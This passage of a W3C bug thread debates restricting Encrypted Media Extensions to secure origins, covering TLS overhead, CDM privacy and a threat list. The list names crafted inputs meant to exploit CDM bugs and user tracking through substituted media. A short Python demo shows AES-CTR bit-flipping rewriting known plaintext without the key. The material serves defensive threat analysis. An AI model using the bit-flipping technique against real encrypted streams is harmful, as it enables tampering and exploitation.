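    print(f"added: {(https_rtts - http_rtts) / http_rtts:.0%}")  # 100% when cold

Session resumption or TLS 1.3 would shrink the extra round trips, and a reused keep-alive connection avoids them entirely, but a cold one-off connection pays the full price.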

Let's leave this proposed mitigation for a later version of the spec where the choice is not as painful.
Comment 61 Ryan Sleevi 2014-08-21 22:38:26 UTC
(In reply to Joe Steele from comment #60)
> The key requests made by some DRMs fall exactly into this category of "very
> short connections". One packet out, one packet in. The overhead of
> negotiating an SSL channel (which may ultimately add nothing to the
> security) can be almost 100%. Even if we wait for TLS 1.3 as suggested. 

Luckily, this is not a specification that deals with legacy DRM systems that are implemented inefficiently. Your CDM does not have a network connection (normatively); it defers to the UA to mediate all key exchanges.

It's amazing how exceedingly efficient UAs are. TLS session resumption. Connection pools. HTTP keep-alive. Novel technologies like XMLHttpRequest or WebSockets. All of these exist, and despite your "key exchange" or "drm" protocol being "one packet in, one packet out", it's virtually impossible to actually find yourself establishing a new connection every time, or dealing with that overhead.
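
To illustrate just one of those mechanisms, here is a minimal Python sketch of TLS session resumption (example.com is a placeholder host; the session APIs shown require Python 3.6+):

    import socket, ssl

    ctx = ssl.create_default_context()

    # First connection: full TLS handshake.
    with socket.create_connection(("example.com", 443)) as raw:
        with ctx.wrap_socket(raw, server_hostname="example.com") as tls:
            session = tls.session  # save the session for reuse

    # Later connection: abbreviated handshake via the saved session, skipping
    # the most expensive parts of negotiation. (TLS 1.3 tickets may arrive
    # after the handshake; this sketches the 1.2-style flow.)
    with socket.create_connection(("example.com", 443)) as raw:
        with ctx.wrap_socket(raw, server_hostname="example.com",
                             session=session) as tls:
            print(tls.session_reused)  # True when the server honors resumption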

Equally, I think you'll be hard-pressed to find a single EME/CDM implementation that's sending as many packets of video stream data as it's receiving, so you surely cannot mean that.

So, especially as demonstrated by browsers (and the updated version includes even more real world data from a variety of high-capacity sites), your overhead is virtually nil.

Also, I think the concerns about latency are a bit misinformed. Latency matters every bit as much for websites serving content as it does for video providers. Milliseconds of latency are measured in impacts of millions of dollars. Seconds of latency are measured in billions. If the latency impact from SSL has not been shown to cripple online commerce, I think you can rest assured it won't compromise streaming either.

http://www.fastcompany.com/1825005/how-one-second-could-cost-amazon-16-billion-sales
Comment 62 Ryan Sleevi 2014-08-21 22:47:00 UTC
(In reply to Joe Steele from comment #56)
> I don't think we are arguing that TLS is not viable (at least I am not). I
> am arguing that HTTP with message-based encryption is equally viable and has
> certain advantages. We should allow implementations to leverage those
> advantages when they want to.

Frankly, this isn't the case for any of the DRM protocols that I've seen. Nor do the affordances of message-based encryption protocols, such as Netflix's description of their desire for WebCrypto over HTTP, meet the security standard expected by UAs (and our constituencies!) for user privacy and confidentiality.

Nor do I think we can argue that a robustly analyzed and audited protocol is somehow less desirable than individual vendors' home-grown protocols, which are by design difficult to analyze or reason about, and which, short of the UAs individually implementing the protocol from scratch and auditing it, cannot afford any assurances even to the UA.

> 
> There is a good writeup on a weakness specific to SSL/TLS here --
> http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
> Perhaps ironically, the tightly controlled message-based encryption used by
> many DRM are not subject to these issues and thus are more secure than SSL
> in this sense at least.

I suspect any rebuttal to this will verge so far off topic that we'll end up in the weeds. To the extent that I cannot let misinformation stand, I would say that the conclusion you reach is not at all supported by the article. Among the many reasons, consider the simplest response: the public can audit the behaviour of CAs, and CAs' business interests are aligned with promoting security (as the alternative is obsolescence). The public CANNOT audit CDMs (as it has been repeatedly established here that this will be the outcome, even if the spec allows for hypothetically audited CDMs), and the business interests of CDMs are inherently geared towards creating a model of "too big to fail" (i.e. that they're an inextricable part of certain large media streaming sites, and as such, no UA can effectively disable or reject the CDM, for fear of breaking the experience for the users).

The rest we can save for a separate discussion in another forum, if it should somehow become necessary to show how a singular monolithic and opaque entity is worse than a diverse and robust competitive space with public audits and transparency.
Comment 63 David Dorwin 2014-08-21 22:48:39 UTC
(In reply to Mark Watson from comment #59)
> I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> secure origin. Other mitigations as outlined in the privacy section need to
> be in place.
> 
> What I said was - assuming those mitigations are in place - then what's left
> of attacks #5 and #6 is no worse with EME than it is without EME.
> Specifically, I did not compare non-clearable identifiers to fingerprinting
> / local storage, I compared clearable, origin-specific, identifiers to those
> things.

Are you arguing for possible option 2 or 3 in comment #0 or that we should normatively require the mitigations for attacks #1 and #2? The former still requires that Netflix and others support HTTPS for some of their traffic. The latter is not possible with many current DRM implementations (so you have the same transition issue).

> It's being argued here that migration to HTTPS is trivial, low cost, and
> therefore a reasonable thing to expect people to do when migrating from
> plug-ins to EME, even though the technical rationale is weak / restricted to
> CDMs that do not follow the privacy / security mitigations in the document
> (but nevertheless somehow get themselves integrated into a UA).

One concern is that flexibility will be abused (i.e. some applications will never support HTTPS, preventing user agents from ever enforcing it). A corollary is that the web platform may be segmented or some user agents may be forced to do the wrong thing if content providers do not support HTTPS. Maybe there are [non-spec] options for avoiding this while slowly ramping up the HTTPS traffic. However, as Ryan says, this is a diversion from the core issue. It's really related to smoothing the transition once the core issue has been resolved.
> 
> I'm disputing both that it is low-cost, particularly at scale, and that the
> mitigations in the document are insufficient.

Do you have a proposal for normative mitigation text? Maybe we should open a separate bug for that.
Comment 64 Joe Steele 2014-08-21 23:25:02 UTC
(In reply to Ryan Sleevi from comment #61)
> (In reply to Joe Steele from comment #60)
> > The key requests made by some DRMs fall exactly into this category of "very
> > short connections". One packet out, one packet in. The overhead of
> > negotiating an SSL channel (which may ultimately add nothing to the
> > security) can be almost 100%. Even if we wait for TLS 1.3 as suggested. 
> 
> Luckily, this is not a specification that deals with legacy DRM systems that
> are implemented inefficiently. Your CDM does not have a network connection
> (normatively), it defers to the UA to mediate all key exchanges.
> 
> It's amazing how exceedingly efficient UAs are. TLS session resumption.
> Connection pools. HTTP keep-alive. Novel technologies like XMLHttpRequest or
> WebSockets. All of these exist, and despite your "key exchange" or "drm"
> protocol being "one packet in, one packet out", it's nearly virtually
> impossible to actually find yourself establishing a new connection every
> time, or dealing with that overhead.

None of this efficiency makes any difference in this case. The CDM is constructing the request - which in our case is a single packet. The application can use any mechanism it likes to send it, but HTTP is good enough in our case and quite efficient. TLS would be overkill and would not add anything to the security. 

> 
> Equally, I think you'll be hard pressed to find a single EME/CDM
> implementation that's sending as many packets of video stream data as
> they're receiving, so you surely cannot mean that.

I do not mean that. I am referring to the latency that will result from the CDN delivering the media stream having to re-encrypt each media segment for delivery.

> 
> So, especially as demonstrated by browsers (and the updated version includes
> even more real world data from a variety of high-capacity sites), your
> overhead is virtually nil.

No. The overhead in my case in particular is large if TLS is used. Less with the better algorithms described in that document, but still large relative to using HTTP. 

> 
> Also, I think the concerns about latency are a bit misinformed. Latency
> matters every bit as much for websites serving content as they do video
> providers. Milliseconds of latency are measured in impacts of millions of
> dollars. Seconds of latency are measured in billions. If the latency impact
> from SSL has not shown to be crippling online commerce, I think you can rest
> assured it won't compromise streaming either.

I will defer to folks who actually implement streaming of live video on that point. But I can say it has been raised as a serious concern by our customers in the past. We spend a significant amount of effort trying to reduce latency for our customers rather than increase it. 

(In reply to Ryan Sleevi from comment #62)
> (In reply to Joe Steele from comment #56)
> > I don't think we are arguing that TLS is not viable (at least I am not). I
> > am arguing that HTTP with message-based encryption is equally viable and has
> > certain advantages. We should allow implementations to leverage those
> > advantages when they want to.
> 
> Frankly, this isn't the case of any of the DRM protocols that I've seen. Nor
> do the affordances of message-based encryption protocols, such as Netflix's
> description of their desire for WebCrypto over HTTP, meet the security
> standard expected by UAs (and our constituencies!) for user privacy and
> confidentiality.

But you have not seen them all. And yet you are proposing to restrict all of them based on the subset you have seen. 

> 
> Nor do I think we can argue that a robustly analyzed and audited protocol is
> somehow less desirable than individual vendors' home-grown protocols, for
> which it is a design goal of the product to make it difficult to analyze or
> reason about, and which short of the UAs individually implementing the
> protocol from scratch and auditing it, cannot have any assurances afforded
> even to the UA.

Your assumption seems to be that all DRM protocols are home-grown and not based on robust, well-analyzed protocols. You have not offered any proof of this other than your experience. There is no reason that the protocol itself has to be difficult to analyze or reason about; it may just not be public which protocol is being used. This argument seems to be getting back to requiring CDMs to be fully documented. Maybe this conversation should move to that bug (Bug 20944).

> > There is a good writeup on a weakness specific to SSL/TLS here --
> > http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
> > Perhaps ironically, the tightly controlled message-based encryption used by
> > many DRM are not subject to these issues and thus are more secure than SSL
> > in this sense at least.
> 
> I suspect any refutal to this will verge so far off topic that we'll end up
> in the weeds. To the extent that I say I cannot let misinformation stand, I
> would say that the conclusion you reach is not at all supported by the
> article. Among the many reasons that this is, consider the most simplest
> response this: The public can audit the behaviour of CAs, and CAs business
> interests are aligned with promoting security (as the alternative is
> obsolence). The public CANNOT audit CDMs (as has been repeatedly established
> here that this be the outcome, even if the spec allows for hypothetically
> audited CDMs), and the business interests of CDMs is inherently geared
> towards creating a model of "too big to fail" (i.e. that they're an
> inextricable part of certain large media streaming sites, and as such, no UA
> can effectively disable or reject the CDM, for fear of breaking the
> experience for the users).
> 
> The rest we can save for a separate discussion in another forum, if it
> should somehow becomes necessary to show how a singular monolithic and
> opaque entity is worse than a diverse and robust competitive space with
> public audits and transparency.

Nice. You try to refute the argument and then say "let's take this elsewhere" implying I would be churlish to respond. Well played sir. 

I am sure when you read the article you realized the implication is that the public CANNOT audit the behavior of CAs to any reasonable degree. And what is worse, even when those CAs have been proven to be bad actors, we can't always move away from them because they are indeed "too big to fail".
Comment 65 Joe Steele 2014-08-21 23:30:45 UTC
(In reply to David Dorwin from comment #63)
> (In reply to Mark Watson from comment #59)
> > I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> > secure origin. Other mitigations as outlined in the privacy section need to
> > be in place.
> > 
> > What I said was - assuming those mitigations are in place - then what's left
> > of attacks #5 and #6 is no worse with EME than it is without EME.
> > Specifically, I did not compare non-clearable identifiers to fingerprinting
> > / local storage, I compared clearable, origin-specific, identifiers to those
> > things.
> 
> Are you arguing for possible option 2 or 3 in comment #0 or that we should
> normatively require the mitigations for attacks #1 and #2? The former still
> requires that Netflix and others support HTTPS for some of their traffic.
> The latter is not possible with many current DRM implementations (so you
> have the same transition issue).

I am curious. Why do you think it is not possible with many current DRM implementations? I certainly think it is less efficient and not needed in some cases, but "not possible" implies the DRM must control the channel. I think a DRM with such a restriction would find it hard to operate as a CDM with or without this restriction. Did you have a specific DRM in mind?
Comment 66 David Dorwin 2014-08-22 00:53:20 UTC
(In reply to Joe Steele from comment #65)
> (In reply to David Dorwin from comment #63)
> > (In reply to Mark Watson from comment #59)
> > > I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> > > secure origin. Other mitigations as outlined in the privacy section need to
> > > be in place.
> > > 
> > > What I said was - assuming those mitigations are in place - then what's left
> > > of attacks #5 and #6 is no worse with EME than it is without EME.
> > > Specifically, I did not compare non-clearable identifiers to fingerprinting
> > > / local storage, I compared clearable, origin-specific, identifiers to those
> > > things.
> > 
> > Are you arguing for possible option 2 or 3 in comment #0 or that we should
> > normatively require the mitigations for attacks #1 and #2? The former still
> > requires that Netflix and others support HTTPS for some of their traffic.
> > The latter is not possible with many current DRM implementations (so you
> > have the same transition issue).
> 
> I am curious. Why do you think it is not possible with many current DRM
> implementations? I certainly think it is less efficient and not needed in
> some cases, but "not possible" implies the DRM must control the channel. I
> think a DRM with such a restriction would find it hard to operate as a CDM
> with or without this restriction. Did you have a specific DRM in mind?

See the mitigations in comment #52. Note that I said *implementations*, not systems or protocols. It's certainly possible to add such mitigations to an implementation, but it might require platform upgrades in some cases. If that is required, there are a lot of other interoperability issues that can also be addressed.
Comment 67 Glenn Adams 2014-08-22 02:22:45 UTC
(In reply to Ryan Sleevi from comment #61)
> Your CDM does not have a network connection
> (normatively), it defers to the UA to mediate all key exchanges.

From what normative text do you derive this statement?
Comment 68 Ryan Sleevi 2014-08-22 03:56:34 UTC
(In reply to Joe Steele from comment #64)
> None of this efficiency makes any difference in this case. The CDM is
> constructing the request - which in our case is a single packet. The
> application can use any mechanism to send it it likes, but HTTP is good
> enough in our case and quite efficient. TLS would be overkill and not add
> anything to the security. 

You cannot have your cake and eat it too. You just described the overhead as being one packet in, one packet out, but that's clearly not the case. The fact that the CDM constructs the request does not require, as you incorrectly suggested, that a UA establish a new connection.

Note that you're also firmly in the territory of non-guaranteed behaviour when you say "HTTP is good enough in our case". One, UAs can and will disagree with that assertion for *your* protocol, and two, not all CDMs may be able to implement that.

In the absence of hard guarantees about the security properties, requiring TLS ensures that, even at a baseline, the security properties are at the minimal acceptable level, and in a way that's consistently implemented (ergo, interoperable).

> I do not mean that. I am referring to the latency that will result from the
> CDN delivering the media stream having to re-encrypt each media segment for
> delivery.

And, as the IETF UTA WG has shown, that latency is effectively non-existent on the whole.

> No. The overhead in my case in particular is large if TLS is used. Less with
> the better algorithms described in that document, but still large relative
> to using HTTP. 

And yet the real-world evidence - and the draft mentioned - shows this is a claim without merit or fact. You can keep repeating it, but that doesn't make it any more true.

> But you have not seen them all. And yet you are proposing to restrict all of
> them based on the subset you have seen. 

Correct. The fact is that most of what we've seen - from members active in this very discussion - fails to meet the minimum bar of security. That a hypothetical CDM might exist which preserves privacy sufficiently is an interesting theoretical discussion, but the practical reality is that few do and, more importantly for this discussion, that there are no guarantees or requirements that they continue to do so.

Because, as Glenn so decisively puts it, this WG will not, in any way, shape, or form, place any requirements that CDMs implement such basic levels of security, it becomes necessary to place requirements on how CDMs are used, since we cannot place requirements on the CDMs themselves. 


> Your assumptions seem to be that all DRM protocols are home-grown and not
> based on robust well analyzed protocols. You have not offered any proof of
> this other than your experience. 

The proof is in the very fact that Mark Watson has repeatedly told the W3C in a variety of forums that the protocols employed CANNOT be discussed in an open context.

If they could, we would and could have a unified CDM architecture and stop faffing about with different licensing protocols.

This inherent opaqueness formally guarantees that such a body of evidence is lacking. If you want to establish that the DRM protocols employed by CDMs - the ones that have significant access to long-term tracking identifiers and which, in the vast majority, actively employ them without any of the mitigations *suggested* in this document - are trustworthy, then I think the burden of proof rests solely with you.

> Nice. You try to refute the argument and then say "let's take this
> elsewhere" implying I would be churlish to respond. Well played sir. 
> 
> I am sure when you read the article you realized the implication is that the
> public CANNOT audit the behavior of CAs to any reasonable degree. And what
> is worse, even when those CA's have been proven to be bad actors, we can't
> always move away from them because they are indeed "too big to fail".

I'm saying that a discussion of the CA ecosystem is entirely inappropriate for this bug. That you're using this as a means to divert the discussion from the more tangible and real security aspects is extremely unfortunate, but equally inappropriate.

I'm more than happy to describe to you exactly how the world that Moxie described THREE YEARS AGO is not at all the world we live in, nor the world we will live in, but this bug is an entirely inappropriate forum and venue for it. I'm not at all casually dismissing Moxie's argument - I think there were many apt observations. But those were old observations that barely held then and certainly do not hold now, so referring to them as somehow proof that TLS is insecure is simply incorrect.

(In reply to Glenn Adams from comment #67)
> (In reply to Ryan Sleevi from comment #61)
> > Your CDM does not have a network connection
> > (normatively), it defers to the UA to mediate all key exchanges.
> 
> From what normative text do you derive this statement?

Merely that CDMs are not normatively guaranteed to have a network connection, not that they are normatively prevented from having one (though they should be, and in practical implementations, are).

They are, however, normatively guaranteed to have a means of having the UA act on their behalf with respect to the key exchange.
Comment 69 Mark Watson 2014-08-22 14:26:11 UTC
(In reply to Ryan Sleevi from comment #68)
> (In reply to Joe Steele from comment #64)

> > Your assumptions seem to be that all DRM protocols are home-grown and not
> > based on robust well analyzed protocols. You have not offered any proof of
> > this other than your experience. 
> 
> The proof is in the very fact that Mark Watson has repeatedly told the W3C
> in a variety of forums that the protocols employed CANNOT be discussed in an
> open context.
> 

I don't recall saying that even once, never mind repeatedly.

It's quite likely I have pointed out the fact that none of the proprietary DRM vendors have published their protocols. As Joe points out, this doesn't mean they are not using open standard protocols and open, well-reviewed implementations, just that we don't know what they are using because they have not told us.

However, UA implementors that integrate CDMs may well know these things for the CDMs they integrate and should be able to make their own security decisions on that basis.

Furthermore, UA implementors that properly sandbox the CDM will know what kind of identifiers it has access to as well as what it does with them.
Comment 70 Henri Sivonen 2014-08-22 14:43:38 UTC
(In reply to David Dorwin from comment #52)
> 7) A non-EME-using site (i.e. no reason to use protected media), ad network,
> etc. uses EME to obtain a "permanent" identifier.

Yeah, it makes sense to separate out the case where an ad network uses EME only for tracking and not to satisfy licensing requirements for movies / TV series / music.

Also, I failed to list the concern you pointed towards in comment 36: an attacker giving maliciously crafted input to a non-sandboxed CDM, whose bugginess level the browser vendor can't control (or even assess), in order to exploit bugs (buffer overflows and the like) in the CDM.

These concerns differ from the previous ones, because they relate to exploiting bugs in the implementation of the DRM instead of exploiting the design of the Key System protocol or its key provisioning practices.

I think it makes sense to break this into eight subcases:

8) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted EME messages to the CDM in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

9) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted PSSH boxes to the CDM in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

10) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted media data to the CDM in order to exploit bugs in the decryption code of the CDM (or, if the CDM subsumes more functionality than it logically has to, in code that processes the media file prior to decryption) to run shell code.

11) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted encrypted media data to the CDM in order to exploit bugs in the post-decryption decoding (codec) code of the CDM to run shell code.

12) An active network attacker injects EME usage into the traffic of a site to send maliciously crafted EME messages to the CDM in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

13) An active network attacker injects maliciously crafted PSSH boxes into media data in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

14) An active network attacker injects maliciously crafted encrypted media data into the CDM in order to exploit bugs in the decryption code of the CDM (or, if the CDM subsumes more functionality than it logically has to, in code that processes the media file prior to decryption) to run shell code.

15) An active network attacker injects maliciously crafted encrypted media data into the CDM in order to exploit bugs in the post-decryption decoding (codec) code of the CDM to run shell code.

Sandboxing would address all of these, but the issue is what can be done with unsandboxed platform CDMs that the browser vendor can't control (or even assess).

Restricting EME to secure origins wouldn't address attacks #8...#11. They could be addressed by maintaining (possibly by asking the user) a list of origins that are allowed to use EME because they are trusted not to try to exploit bugs in the CDM. Attack modifications to bypass the allow-list would basically be attacks #12...#15, which could then be addressed by requiring secure origins.

Restricting EME to secure origins and blocking mixed-content XHR and Web Sockets would address attack #12. It would also address attack #13 when initialization data is carried outside the media files. However, unless passive mixed content is blocked, too, requiring a secure origin for the EME-using application would not address attacks #13...#15, since the media file could still be loaded from insecure origins.

Requiring secure origins even for the media files would address attacks #13...#15, but judging from the comments on this bug, that sort of requirement seems to be considered particularly infeasible.

Attacks #13 and #9 could be addressed by limiting the PSSH boxes to such (unencrypted) formats that can be validated by the browser (analogously to browsers validating WebGL shaders before passing them to a shader compiler whose bugs aren't under the control of the browser vendor).
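
To sketch what such browser-side validation could look like, here is a hypothetical Python validator for a single 'pssh' box, following the structure defined in ISO/IEC 23001-7 (it ignores 64-bit box sizes for brevity; the bounds checks are the point, since those are exactly what a buggy CDM parser might get wrong):

    import struct

    def validate_pssh(box: bytes) -> bool:
        """Structurally validate one ISO/IEC 23001-7 'pssh' box (v0 or v1)."""
        if len(box) < 32:              # header + version/flags + SystemID + size
            return False
        size, box_type = struct.unpack_from(">I4s", box, 0)
        if box_type != b"pssh" or size != len(box):
            return False
        version = box[8]
        if version > 1 or box[9:12] != b"\x00\x00\x00":   # flags must be zero
            return False
        offset = 12 + 16               # FullBox header + 16-byte SystemID
        if version == 1:               # v1 adds a list of 16-byte key IDs
            if offset + 4 > len(box):
                return False
            (kid_count,) = struct.unpack_from(">I", box, offset)
            offset += 4 + 16 * kid_count
        if offset + 4 > len(box):
            return False
        (data_size,) = struct.unpack_from(">I", box, offset)
        return offset + 4 + data_size == len(box)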

Attacks #14 and #10 could be addressed by making sure that the CDM doesn't subsume any functionality that it logically does not need to (e.g. does not perform MP4 demultiplexing) and then making the leap of faith that the AES-CTR decryption step is narrow enough to be bug-free.

Attacks #15 and #11 could be addressed by performing cryptographic integrity checking as part of the decryption step, but as I understand it (please correct me if I'm wrong; I don't have the CENC spec at hand), neither WebM encryption nor CENC in MP4 involves MAC checking, leaving the formats vulnerable to CTR malleability attacks. This means that an attacker who gets to replace data in a media file can at least fuzz the codecs with random data, which might not be enough for exploit development. However, to the extent there are parts of the codec data whose plaintext in a particular position is known or guessable, and the codec implementation has a bug that can be exploited by manipulating data at that position, it is possible for the attacker to manipulate the data that way. There is the mitigating factor that since the codec data is supposed to be *compressed*, runs of data whose plaintext is known hopefully aren't long enough to hold shell code. Switching away from CENC to add integrity checking seems too drastic in terms of the compatibility properties that EME seeks.
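
The malleability is easy to demonstrate. A minimal sketch using the third-party Python cryptography package, with made-up plaintext standing in for codec data whose position and value the attacker can guess:

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key, nonce = os.urandom(16), os.urandom(16)
    plaintext = b"codec config: width=0640"  # stand-in for guessable codec bytes

    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    ct = bytearray(enc.update(plaintext) + enc.finalize())

    # With no MAC, an attacker who can guess the plaintext at an offset can
    # rewrite it by XORing the ciphertext -- no knowledge of the key needed.
    known, wanted = b"0640", b"9999"
    off = plaintext.index(known)
    for i in range(len(known)):
        ct[off + i] ^= known[i] ^ wanted[i]

    dec = Cipher(algorithms.AES(key), modes.CTR(nonce)).decryptor()
    print(dec.update(bytes(ct)) + dec.finalize())  # b'codec config: width=9999'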

However, attacks #15 and #11 are CDM-specific attack surface only if the codec implementation is CDM-specific. If the browser uses the same platform codec implementation in non-DRM cases, bugs in the codec can be exploited without EME (unless the browser validates all data before passing it to the codec in the case where the data is not encrypted, but that seems unlikely due to performance reasons).

(In reply to Mark Watson from comment #50)
> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

The largest chunk of traffic is the media data, which is "passive mixed content" if embedded from an insecure origin into a page coming from a secure origin. In the comment of mine that you are replying to, I intentionally mentioned blocking mixed-content XHR and Web Sockets but didn't mention blocking mixed-content media data. When assessing the feasibility of restricting EME to secure origins, requiring the EME-using script to run in the context of a secure origin and the key acquisitions to happen with a secure origin is one thing and making all the media data come from secure origins, too, is another thing.

(In reply to Mark Watson from comment #59)
> even though the technical rationale is weak / restricted to
> CDMs that do not follow the privacy / security mitigations in the document
> (but nevertheless somehow get themselves integrated into a UA).

Suppose someone seeks to make a browser, with the level of care for privacy that the members of the Chrome team show here, for a device that has a CDM for a Netflix-supported Key System, but whose device-instance-specific CDM keys are factory-provisioned and unchangeable as a consequence of a higher-than-desktop robustness solution. Assuming that Netflix continues to serve the application from an insecure origin to desktop browsers, would Netflix serve the application from a secure origin just to such a browser if requested by the browser maker, or leave it up to the browser maker to get the CDM implementation and the manufacturing flow changed if better privacy properties are desired?

That is, how realistic is it, really, for the secure origin requirement to be contextual to a particular CDM implementation? It seems to me that unless major desktop browsers restrict EME to secure origins, browsers on devices with different CDM identifier stickiness characteristics aren't in a position where they could demand different treatment (i.e. to be served from secure origins only).

(In reply to Joe Steele from comment #60)
> The key requests made by some DRMs fall exactly into this category of "very
> short connections". One packet out, one packet in. The overhead of
> negotiating an SSL channel (which may ultimately add nothing to the
> security) can be almost 100%.

Not necessarily, if the key requests get multiplexed into a pre-existing SPDY/HTTP2 connection to the server the HTML page already came from, which is quite possible when the key requests go over XHR to an application server in front of the actual key server so that the application server can check cookies.
Comment 71 Henri Sivonen 2014-08-23 07:50:54 UTC
(In reply to Henri Sivonen from comment #70)
> (In reply to David Dorwin from comment #52)
> > 7) A non-EME-using site (i.e. no reason to use protected media), ad network,
> > etc. uses EME to obtain a "permanent" identifier.
> 
> Yeah, it makes sense to separate out the case where an ad network uses EME
> only for tracking and not to satisfy licensing requirements for movies / TV
> series / music.

I somehow failed to mention:

I've advocated that we address attack #7 by partitioning the browser-provided salt (see the mitigation for attack #2) not just by the origin using EME but by the combination of the origin using EME and the origin of the top-level browsing context.

That is, if site A provides EME-using iframes for sites B and C, it sees a different CDM identity when iframed by B compared to when iframed by C.
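
A minimal sketch of that partitioning (the derivation function and the browser-held secret are assumptions; any per-profile secret fed through a PRF would do):

    import hashlib, hmac, os

    BROWSER_SECRET = os.urandom(32)  # per-profile; regenerated on "clear data"

    def eme_salt(eme_origin: str, top_level_origin: str) -> bytes:
        """Derive the CDM salt from the (EME origin, top-level origin) pair."""
        label = eme_origin.encode() + b"\x00" + top_level_origin.encode()
        return hmac.new(BROWSER_SECRET, label, hashlib.sha256).digest()

    # Site A iframed by B and by C sees two unlinkable CDM identities:
    assert eme_salt("https://a.example", "https://b.example") != \
           eme_salt("https://a.example", "https://c.example")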
Comment 72 Henri Sivonen 2014-08-23 13:24:20 UTC
(In reply to Henri Sivonen from comment #70)
> The largest chunk of traffic is the media data, which is "passive mixed
> content" if embedded from an insecure origin into a page coming from a
> secure origin.

Oops. That's not the case with MSE+XHR. Indeed, it's a pretty big change if, as a side effect of MSE use, the media segments end up having to come from a secure origin in addition to the application code and the key acquisition being restricted to secure origins.
Comment 73 Ryan Sleevi 2014-08-25 04:18:27 UTC
(In reply to Henri Sivonen from comment #72)
> (In reply to Henri Sivonen from comment #70)
> > The largest chunk of traffic is the media data, which is "passive mixed
> > content" if embedded from an insecure origin into a page coming from a
> > secure origin.
> 
> Oops. That's not the case with MSE+XHR. Indeed, it's pretty big change if as
> a side effect of MSE use, the media segments end up having to come from a
> secure origin in addition to the application code and the key acquisition
> being restricted to secure origins.

Considering that the majority of UAs already restrict XHRs as active mixed content (FF, IE, Chrome), I think this is a given, and not a change but the norm.

Still, I don't think that media content necessarily means it's not a privacy risk, considering the relationship of media content to the licensing itself - even if it's not directly tied to key acquisition.
Comment 74 Henri Sivonen 2014-08-25 09:24:41 UTC
(In reply to Ryan Sleevi from comment #73)
> Still, I don't think that media content necessarily means it's not a privacy
> risk

Sure, it's a privacy risk in the sense of revealing what content you watch, but it's not a risk in the sense of revealing a device-bound CDM ID.
Comment 75 Joe Steele 2014-08-25 16:03:02 UTC
(In reply to Henri Sivonen from comment #70)
> (In reply to Joe Steele from comment #60)
> > The key requests made by some DRMs fall exactly into this category of "very
> > short connections". One packet out, one packet in. The overhead of
> > negotiating an SSL channel (which may ultimately add nothing to the
> > security) can be almost 100%.
> 
> Not necessarily if the key requests get multiplexed into a pre-existing
> SPDY/HTTP2 connection that's open to the server where either the HTML page
> already came from, which is quite possible when the key requests go over XHR
> and go to an application server in front of the actual key server so that
> the application server can check cookies.

Most small to medium-size content publishing companies do not want the hassle of running their own license servers (especially multiple of them). They will either choose to use services provided directly by the DRM vendor or those of an OVP like Brightcove, which provides all the endpoints. In either case, the license server is not likely to be running on the same server the application is being served from. However, the large companies who run their own license servers are also the ones who would most benefit from this optimization. It would be good to have feedback from big content publishers (e.g. YouTube, Amazon, and Comcast, to name a few).


(In reply to Ryan Sleevi from comment #68)
> (In reply to Joe Steele from comment #64)
> > None of this efficiency makes any difference in this case. The CDM is
> > constructing the request - which in our case is a single packet. The
> > application can use any mechanism to send it it likes, but HTTP is good
> > enough in our case and quite efficient. TLS would be overkill and not add
> > anything to the security. 
> 
> You cannot have your cake and eat it to. You just described the overhead as
> being one packet in, one packet out, but that's clearly not the case. Just
> because the CDM constructs the request does not require, as you incorrectly
> suggested, that a UA establish a new connection.
> 
> Note that you're also firm in the territory of non-guaranteed behaviour when
> you say "HTTP is good enough in our case". One, UAs can and will disagree
> with that assertion for *your* protocol, and two, not all CDMs may be able
> to implement that.
> 
> In the absence of hard guarantees about the security properties, requiring
> TLS is to ensure that even at a baseline, the security properties are the
> minimal acceptable level, and in a way that's consistently implemented
> (ergo, interorperable)

I think it's fairly clear at this point that we are not going to convince each other. However, I am willing to stipulate that requiring SSL for the application download would be a really good thing. I am also willing to stipulate that requiring it for the key exchange is not a bad thing. It may not add anything to privacy in some cases, but if it makes the APIs more palatable I am not opposed. I am not convinced that requiring it for the media APIs is a good idea - which is what this will effectively do, as far as I can tell. 

We have one large content publisher commenting that this will be a problem. We need more feedback from other content publishers. 

Ryan/David can you reach out for comment to the folks who work on YouTube and get their feedback here? 

Anticipating that the rest of the feedback from content publishers will be negative, is there any way we can mitigate the mixed-content problem?
Comment 76 Ryan Sleevi 2014-08-25 16:36:38 UTC
(In reply to Henri Sivonen from comment #74)
> (In reply to Ryan Sleevi from comment #73)
> > Still, I don't think that media content necessarily means it's not a privacy
> > risk
> 
> Sure, it's a privacy risk in the sense of revealing what content you watch,
> but it's not a risk in the sense of revealing a device-bound CDM ID.

Well, no, that's not guaranteed, certainly not by the spec.

Again, this is dependent upon the CDM, and I think there will continue to be disagreement as to how much or how little a UA can ensure its privacy goals are met when negotiating with CDMs and content providers.

Consider a particular media file that is encrypted with a key that only User A can obtain (from the license server). Even if User A is presented to the site as some salted (potentially cleared) data, the site can still employ the CDM/licensing mechanism to track the user, since only User A is authorized to view it.

A hostile intermediate could thus substitute a legitimate file with such a file and discover that the user is indeed User A.

Or, depending again upon the CDM implementation and protection mechanisms employed, a hostile intermediate might be able to craft a hostile media file that causes the user to talk to the license server iff they are User A, but not User B.  There, again, even if the CDM/License communication is TLS protected, the ability to inject the media represents a side-channel attack on user privacy.
Comment 77 David Dorwin 2014-09-17 19:55:48 UTC
(In reply to Henri Sivonen from comment #70)
I filed bug 26838 to address some of the vulnerabilities related to initData - specifically attacks #13-15.
Comment 78 Domenic Denicola 2014-09-17 20:59:28 UTC
Hi all,

